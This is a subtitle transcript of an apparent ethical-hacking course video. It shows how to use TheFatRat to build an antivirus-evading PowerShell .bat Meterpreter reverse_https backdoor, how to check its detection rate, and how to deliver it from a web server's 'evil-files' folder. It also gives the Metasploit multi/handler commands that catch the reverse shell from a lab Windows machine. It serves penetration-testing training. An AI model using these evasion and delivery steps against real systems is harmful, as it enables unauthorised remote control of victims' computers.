Would you like to inspect the original subtitles? These are the user uploaded subtitles that are being translated: 1 00:00:00,600 --> 00:00:06,940 Okay, now that we have TheFatRat loaded, let's see how we can use it to generate an undetectable backdoor. 2 00:00:07,660 --> 00:00:13,520 Now you can see the tool can be used to do many more things, like it creates an a backdoor for Android 3 00:00:13,520 --> 00:00:18,620 and combining a backdoor with another file but we're not going to be talking about that now. 4 00:00:18,620 --> 00:00:20,800 We're gonna go over that later on in the course. 5 00:00:21,020 --> 00:00:25,460 But for now we're interested into creating an undetectable backdoor. 6 00:00:26,240 --> 00:00:32,280 And the one I'm gonna use is Creating one with PwnWinds which actually uses PowerShell. 7 00:00:33,020 --> 00:00:38,840 So this is number '06' right here, so all I have to do is just enter '06' or '6' 8 00:00:40,640 --> 00:00:46,320 and that will take me to PwnWinds, which gives me even even more options to generate the backdoor. 9 00:00:48,240 --> 00:00:51,200 Now the backdoor generated with this uses PowerShell 10 00:00:51,600 --> 00:00:55,080 and PowerShell is basically, a framework made by Windows, 11 00:00:55,400 --> 00:00:59,480 which a kind of expands on to the basic DOS commands. 12 00:00:59,740 --> 00:01:04,580 So it basically, gives you more Shell commands that can be used to automate tasks 13 00:01:04,580 --> 00:01:07,460 and run things on Windows Operating Systems. 14 00:01:08,060 --> 00:01:12,680 Powershell comes in pre-installed with all Windows machines after Windows 7. 15 00:01:13,120 --> 00:01:17,100 So you can guarantee that it's going to work on all Windows computers, 16 00:01:17,100 --> 00:01:19,160 if they're running Windows 7 and up. 17 00:01:21,080 --> 00:01:24,760 I'm gonna 'Create a bat', which is an executable type 18 00:01:25,100 --> 00:01:30,680 and that's gonna use PowerShell to inject the backdoor and give us the Reverse Shell. 19 00:01:31,200 --> 00:01:36,480 The other options will still use PowerShell but we'll create a slightly different backdoor. 20 00:01:36,500 --> 00:01:41,540 For example, you can see this one will attempt to embed the backdoor with a PDF 21 00:01:41,540 --> 00:01:43,320 but it won't work against all systems. 22 00:01:43,740 --> 00:01:47,560 You'll see that this one will use 'C', this one will use 'Apache', 23 00:01:47,820 --> 00:01:53,960 this one will use 'C#' but for our one, we're just going to use a basic BAT file with PowerShell 24 00:01:53,960 --> 00:01:57,180 and it should be able to bypass antivirus programs. 25 00:01:58,040 --> 00:02:02,200 So I'm gonna go with number '1' which uses a bat file with PowerShell 26 00:02:02,460 --> 00:02:06,500 and the reason why I'm going with it because I've actually already tested the others 27 00:02:06,500 --> 00:02:12,560 and they get detected by at least an antivirus programs, so I'm gonna go with number '1'. 28 00:02:13,240 --> 00:02:17,160 And then you can see that the tool is really nice because it already tells us 29 00:02:17,160 --> 00:02:24,500 our local IP, our real IP and our Hostname, now we'll talk about the real IP and all of that later on. 30 00:02:24,820 --> 00:02:30,300 For now all that, we're interested in is our local IP and when we were using Veil, 31 00:02:30,300 --> 00:02:34,020 we had to run 'ifconfig' to see what's our local IP. 32 00:02:34,660 --> 00:02:40,060 So remember we had to split the screen and do 'ifconfig' 33 00:02:41,680 --> 00:02:46,020 and then we can see that our local IP is '10.20.14.213'. 34 00:02:46,700 --> 00:02:51,180 But in here it's actually given a start already, so we can just give it straight away 35 00:02:51,560 --> 00:02:53,909 and we don't have to do set, so remember with Veil, 36 00:02:53,909 --> 00:02:56,580 we had to say set something equals something and all that. 37 00:02:56,860 --> 00:03:00,140 For now we can just give it the IP straight away. 38 00:03:00,720 --> 00:03:07,020 So it's asking for the 'LHOST', which is my local IP and that's '10.20.14.213' 39 00:03:09,060 --> 00:03:13,160 and then it's asking me for the Port to be used for the reverse connection 40 00:03:13,500 --> 00:03:15,540 and I'm going to set that to 8080 41 00:03:17,620 --> 00:03:27,560 and then it's asking me what do I want to call the file and I'm just gonna call it 'rev_https_8080_' 42 00:03:28,040 --> 00:03:33,340 and I'm gonna put 'fr' at the end for FatRat so we know that this was generated using TheFatRat. 43 00:03:34,300 --> 00:03:35,580 So I'm gonna hit 'Enter' 44 00:03:36,580 --> 00:03:40,520 and then it's gonna ask me what type of Payload do I want to use. 45 00:03:41,060 --> 00:03:46,660 So if you look at these, you'll see that they're actually kind of similar to the Payloads in Veil-Evasion. 46 00:03:47,120 --> 00:03:50,480 Especially, the last parts, so you can see that we have 'Meterpreter payloads' 47 00:03:51,000 --> 00:03:58,120 and you can see that we have a 'reverse_tcp' and we have a 'reverse_http' and if we scroll down, 48 00:03:58,120 --> 00:04:04,760 we have the 'meterpreterreverse_https', which is the same payload that we used with Veil-Evasion. 49 00:04:06,200 --> 00:04:11,320 So again, essentially, we're generating the exact same payload which is gonna give us 50 00:04:11,320 --> 00:04:13,580 the exact same access to the computer. 51 00:04:14,000 --> 00:04:17,840 The only difference is the way that this payload is going to be delivered 52 00:04:17,840 --> 00:04:20,360 and executed on the target computer. 53 00:04:22,300 --> 00:04:26,300 So I'm gonna click on 'OK' and again just like Veil-Evasion, 54 00:04:26,300 --> 00:04:31,060 TheFatRat will actually use 'Metasploit' framework to generate the payload. 55 00:04:33,740 --> 00:04:41,200 And now it's telling me that the payload is saved to the output folder and that's it it's telling me do I want to 'Exit' 56 00:04:41,200 --> 00:04:43,280 and I'm gonna say 'Yes' I'm done with you thank you. 57 00:04:45,320 --> 00:04:48,640 And that's it, we're out of TheFatRat. 58 00:04:49,220 --> 00:04:51,460 Now what I wanna do is I wanna just check 59 00:04:51,460 --> 00:04:55,500 and make sure that this backdoor is not detected by any antivirus programs. 60 00:04:56,380 --> 00:04:59,520 So I'm gonna go down and I'm gonna go on my browser. 61 00:05:01,680 --> 00:05:03,060 I'm gonna upload a file 62 00:05:04,800 --> 00:05:11,600 and the file is going to be stored in the output of TheFatRat. 63 00:05:11,600 --> 00:05:18,880 So as you remember, TheFatRat was stored in 'opt', so I'm actually just clicking here on the pen in here. 64 00:05:18,940 --> 00:05:23,880 And then I'm gonna give the full access to the full path where the backdoor is stored 65 00:05:24,280 --> 00:05:28,740 and it start in the same location, where we create-- Where we installed TheFatRat. 66 00:05:28,960 --> 00:05:34,560 So that was in '/opt/TheFatRat', if you remember 67 00:05:34,560 --> 00:05:37,940 and you can see that we have all the files of TheFatRat right here. 68 00:05:38,260 --> 00:05:44,160 Now if we go to 'output', there should be a file called 'output' and that's it right here. 69 00:05:44,980 --> 00:05:52,420 And in it, we have our backdoor, which is called the 'rev_https_8080_fr.bat' 70 00:05:53,520 --> 00:05:57,260 I'm gonna 'Open' this file and 'Scan' it 71 00:05:59,340 --> 00:06:06,120 and as you can see the scan is done and it's only being detected by one antivirus program. 72 00:06:06,760 --> 00:06:12,700 So it's bypassing actually, pretty much all the famous antivirus programs, it's bypassing McAfee, 73 00:06:12,960 --> 00:06:21,400 it's bypassing Kaspersky, it's bypassing AVG, it's bypassing Norton right here. 74 00:06:21,760 --> 00:06:27,780 It's pretty much bypassing everything, the only one that's detecting it, is IKARUS security. 75 00:06:29,120 --> 00:06:33,520 So out of all the antivirus programs, we'll be able to bypass them all, 76 00:06:33,520 --> 00:06:37,820 except for this particular antivirus program, which is a really, really good result. 77 00:06:39,200 --> 00:06:45,920 So I'm gonna go back and we're gonna test the backdoor exactly the same way we tested our Veil backdoor. 78 00:06:46,280 --> 00:06:51,080 So the first thing we're gonna do is we're gonna listen for incoming connections using 'msfconsole' 79 00:06:52,540 --> 00:06:56,980 and we're gonna use the multi handler exactly the same way that we used it before. 80 00:06:57,560 --> 00:07:01,880 Keep in mind that doesn't matter how we created the payload both of these payloads use 81 00:07:01,880 --> 00:07:04,520 a 'Meterpreter_reverse_http' connection. 82 00:07:05,020 --> 00:07:10,140 Therefore, when we want to listen for incoming connections, we're gonna use the same module 83 00:07:10,140 --> 00:07:11,280 and the same payload. 84 00:07:11,940 --> 00:07:15,500 So I'm gonna do this a bit quickly because we have done it and explained it before. 85 00:07:15,920 --> 00:07:19,100 So the first thing I'm gonna do is 'use exploit/multi/handler'. 86 00:07:21,280 --> 00:07:22,880 Then I'm gonna set the payload 87 00:07:23,880 --> 00:07:29,340 and I have to set this exactly to the same payload that I created that I want to receive connections from. 88 00:07:29,820 --> 00:07:33,200 And we created a 'meterpreter_reverse_http payload'. 89 00:07:33,600 --> 00:07:41,680 So that's what we're gonna do to 'windows/meterpreter/reverse_https' 90 00:07:43,520 --> 00:07:47,300 and then we're gonna set the 'LHOST' to the IP address of my machine. 91 00:07:47,300 --> 00:07:50,880 Again, the same 'LHOST' that we set when we created the backdoor. 92 00:07:52,360 --> 00:07:57,240 And we're gonna set the 'LPORT' to the part that we want to receive the connection from 93 00:07:57,240 --> 00:08:02,060 and again the same 'LPORT' that we used when we created the backdoor, so it's 8080. 94 00:08:03,280 --> 00:08:08,600 And now all is done, I'm just gonna do 'show options' and just to make sure everything is okay 95 00:08:08,600 --> 00:08:12,060 and we can see that we were using a 'windows/meterpreter/reverse_https'. 96 00:08:12,780 --> 00:08:17,600 We have the right IP and we have the right port, so everything is perfect. 97 00:08:17,940 --> 00:08:21,400 Now I'm actually just gonna run one command before I run this exploit. 98 00:08:21,400 --> 00:08:27,320 I'm gonna do 'save' and what this will do is it's gonna save all this config automatically, 99 00:08:27,320 --> 00:08:33,660 so that the next time, I run 'msfconsole', I'll have the multi headler, Handler loaded already 100 00:08:33,820 --> 00:08:38,960 and it will have all these options pre configured automatically so I won't have to do it again. 101 00:08:39,940 --> 00:08:48,660 and now I'm just gonna do 'exploit' to run this module and wait for incoming connections on 8080. 102 00:08:48,960 --> 00:08:53,520 The last step to do now is to just run the backdoor on my Windows machine 103 00:08:53,980 --> 00:08:57,220 and I'm gonna deliver it using our very basic delivery method 104 00:08:58,000 --> 00:09:04,320 and that's basically by placing our backdoor in our Web server 105 00:09:04,680 --> 00:09:07,860 and then we're going to download it from the Windows machine. 106 00:09:08,780 --> 00:09:17,220 So my backdoor is right here, I'm gonna 'copy' it and I'm gonna click on the address bar again, 107 00:09:17,220 --> 00:09:28,580 put forward slash and then put var/www/html/' and we created a directory called 'evil-files' 108 00:09:30,160 --> 00:09:35,140 that we stored our previous backdoor in and I'm gonna paste this backdoor in it 109 00:09:37,020 --> 00:09:38,732 and that's it, we're good to go. 110 00:09:38,740 --> 00:09:43,380 So we're just going to download it from the Windows machine, like we did in the previous video. 111 00:09:43,800 --> 00:09:48,480 And before I can download it, I need to start the Apache server, the web server in Kali 112 00:09:48,660 --> 00:09:52,200 and we're gonna do that using the command service. 113 00:09:52,740 --> 00:09:54,280 Apache to start. 114 00:09:58,060 --> 00:09:59,880 So I'm gonna go to my Windows machine 115 00:10:02,040 --> 00:10:09,460 and I'm gonna navigate to my website, which is '10.20.14.213' the same IP as the Kali IP 116 00:10:09,460 --> 00:10:14,300 and we're gonna go to the directory that contains the evil files which is called 'evil-files'. 117 00:10:15,900 --> 00:10:19,300 And we can see our two backdoors, we see the one that we used before 118 00:10:19,680 --> 00:10:24,540 and we have our new backdoor here which is called 'rev_https_8080_fr', 119 00:10:25,420 --> 00:10:31,600 I'm going to click that, 'Download' it and then I'm gonna run it 120 00:10:33,280 --> 00:10:37,980 and again, Windows is just telling, telling me be careful this is an executable, 121 00:10:37,980 --> 00:10:42,200 so be careful when you're on files like this, it's not telling me that it's a virus 122 00:10:42,580 --> 00:10:47,040 and it's not telling me that it contains malware, so I'm gonna run it anyway. 123 00:10:50,600 --> 00:10:52,680 And if we come back here, 124 00:10:54,660 --> 00:10:57,300 you'll see that we got a 'Meterpreter Shell' 125 00:10:58,860 --> 00:11:05,140 and the connection came back again from the target computer, which is at '10.20.14. 206', 126 00:11:05,140 --> 00:11:07,880 came back to us on Port 8080. 127 00:11:09,080 --> 00:11:15,920 Now, like I said before, now, I basically, hacked the Windows machine, I can do anything I want to do on it. 128 00:11:16,120 --> 00:11:18,180 So if I just do 'sysinfo' to confirm, 129 00:11:21,320 --> 00:11:24,620 you can see we can get the information about that machine 130 00:11:24,620 --> 00:11:29,180 and we can basically do anything that the target person can do on their computer. 13824